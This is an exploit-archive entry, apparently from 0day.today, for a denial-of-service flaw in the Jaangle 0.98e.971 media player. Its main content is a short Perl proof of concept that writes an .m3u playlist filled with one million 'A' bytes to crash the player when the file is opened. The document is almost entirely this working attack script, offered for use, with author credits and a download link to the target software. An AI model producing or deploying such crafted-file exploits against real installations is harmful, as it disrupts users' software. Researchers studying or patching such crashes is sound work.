id: 13556
date: 08/02/2010
title: Jaangle 0.98e.971 Denial of Service Vulnerability
author: hadji samir
cves: 

=================================================
Jaangle 0.98e.971 Denial of Service Vulnerability
=================================================


#!/usr/bin/perl
# jaangle 0.98e.971
# Author: s-dz        , s-dz@hotmail.fr
# Download : http://www.jaangle.com/files/jsetup.exe
# Tested : Windows XP SP2 (fr)
# DATE   : 2010-08-02
#
# thanks TCT , DGM8
#
my $file= "mahboul-3lik00.m3u";
my $junk= "\x41" x  1000000;
 
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");



#  0day.today [2023-03-21]  #